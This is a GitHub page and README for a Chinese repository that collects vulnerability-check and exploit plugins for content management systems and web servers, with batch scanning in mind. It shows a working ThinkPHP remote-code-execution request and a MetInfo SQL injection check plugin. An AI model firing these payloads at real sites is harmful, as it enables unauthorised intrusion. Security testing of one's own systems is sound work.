https://github.com/1oid/cms_poc_exp
cms漏洞插件搜集
https://github.com/1oid/cms_poc_exp
Last synced: about 2 months ago
JSON representation
cms漏洞插件搜集
- Host: GitHub
- URL: https://github.com/1oid/cms_poc_exp
- Owner: 1oid
- Created: 2018-11-25T06:51:10.000Z (over 7 years ago)
- Default Branch: master
- Last Pushed: 2023-08-08T15:34:40.000Z (over 2 years ago)
- Last Synced: 2025-07-12T01:32:38.980Z (8 months ago)
- Language: Python
- Homepage:
- Size: 5.48 MB
- Stars: 107
- Watchers: 3
- Forks: 26
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - 1oid/cms_poc_exp - cms漏洞插件搜集 (Python)
README
# cms_poc_exp (扫描版本、兼容pocsuite3插件调用)
___
## 此项目的目的与意义
> 个人精力有限,故公开此项目让感兴趣的人一起搜集插件为自己/作者扫描器提供强力的驱动
> 如果感兴趣为本项目提供支持,可以联系本人QQ102102938
## 项目说明
- ~~本项目插件现已支持Python3 不再兼容Python2,故若要使用 [ShellFrameworkd](https://github.com/1oid/Shell-Frameworkd)
进行批量扫描,请自行修改插件支持Python2~~
- ~~[ShellFrameworkd](https://github.com/1oid/Shell-Frameworkd)批量扫描将会再之后修改为支持Python3~~
- `ShellFrameworkd`已更名为[PocBatch-M](https://github.com/1oid/PocBatch-M)并支持了Python3
- 更新pocsuite3插件调用 20211116
- 更新算法,新增颜色 20220301
## 使用说明
`python3 scan.py -u "http://43.*.*.*" -m dedecms`
```
➜ cms_poc_exp_dev git:(dev) ✗ python3 newscan.py -u "http://localhost:8080" -m thinkphp
[INFO] loaded exploits folder 31
[INFO] loaded 4 plugins for thinkphp
[NOT] check thinkphp_5_0_to_23_rce_captcha_poc2 not vulnerability
[NOT] check thinkphp_5_0_to_23_rce_captcha not vulnerability
[FIND] [ThinkphpRCE] http://localhost:8080?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
[NOT] check thinkphp_5_0_to_20_rce_captcha not vulnerability
```
## 现有的cms插件
- [dedecms](https://github.com/1oid/cms_poc_exp/tree/master/dedecms)
- [discuz](https://github.com/1oid/cms_poc_exp/tree/master/discuz)
- [emobile](https://github.com/1oid/cms_poc_exp/tree/master/emobile)
- [finecms](https://github.com/1oid/cms_poc_exp/tree/master/finecms)
- [jcms](https://github.com/1oid/cms_poc_exp/tree/master/jcms)
- [maccms](https://github.com/1oid/cms_poc_exp/tree/master/maccms)
- [metinfo](https://github.com/1oid/cms_poc_exp/tree/master/metinfo)
- [phpcms](https://github.com/1oid/cms_poc_exp/tree/master/phpcms)
- [tomcat](https://github.com/1oid/cms_poc_exp/tree/master/tomcat)
- [weblogic](https://github.com/1oid/cms_poc_exp/tree/master/weblogic)
- [wordpress](https://github.com/1oid/cms_poc_exp/tree/master/wordpress)
- [网站扫描插件_其他通用漏洞](https://github.com/1oid/cms_poc_exp/tree/master/www)
- [yonyouoa](https://github.com/1oid/cms_poc_exp/tree/master/yongyouoa)
- [zfsoft](https://github.com/1oid/cms_poc_exp/tree/master/zfsoft)
- [jetty](https://github.com/1oid/cms_poc_exp/tree/master/jetty)
- [ecshop](https://github.com/1oid/cms_poc_exp/tree/master/ecshop)
- [74cms](https://github.com/1oid/cms_poc_exp/tree/master/74cms)
## 插件编写格式,
```python
class Exploit:
def attack(self, url):
# 这里写验证漏洞的一些代码
return "返回(提示)字符串"
```
调用 `Exploit().attack(url)`
以`metinfo_login_lang_sql`插件为例
```python
import requests
from urllib.parse import quote
class Exploit:
def attack(self, url):
true_url = url + "/admin/login/login_check.php?langset=cn" + quote("' and '1' ='1")
false_url = url + "/admin/login/login_check.php?langset=cn" + quote("' and '1' ='2")
response = requests.get(true_url)
response2 = requests.get(false_url)
if 'not have this language' in response2.text and 'not have this language' not in response.text:
return "{} has SQL Injection!".format(true_url)
```
## 插件编写注意事项
+ 拒绝重复插件, 新增了一个`find.py`, 通过特征来搜索已存在的脚本是否含有指定特征
使用方法:
- 方法一: `python3 find.py cms名称 特征` 例如 `python3 find.py dedecms /install/index.php`
- 方法二: `python3 find.py 特征` 例如 `python3 find.py /install/index.php` (如果不指定cms, 则会查找本地所有的插件)
## 本项目目前支持/贡献的人
- [1oid(作者)](https://github.com/1oid)
- [ske](https://github.com/SkewwG/)提供自己编写的插件[VulScan](https://github.com/SkewwG/VulScan)
- [LiodAir](https://github.com/LiodAir)提交分支
- [icetea1](https://github.com/icetea1) 提交新的cms和poc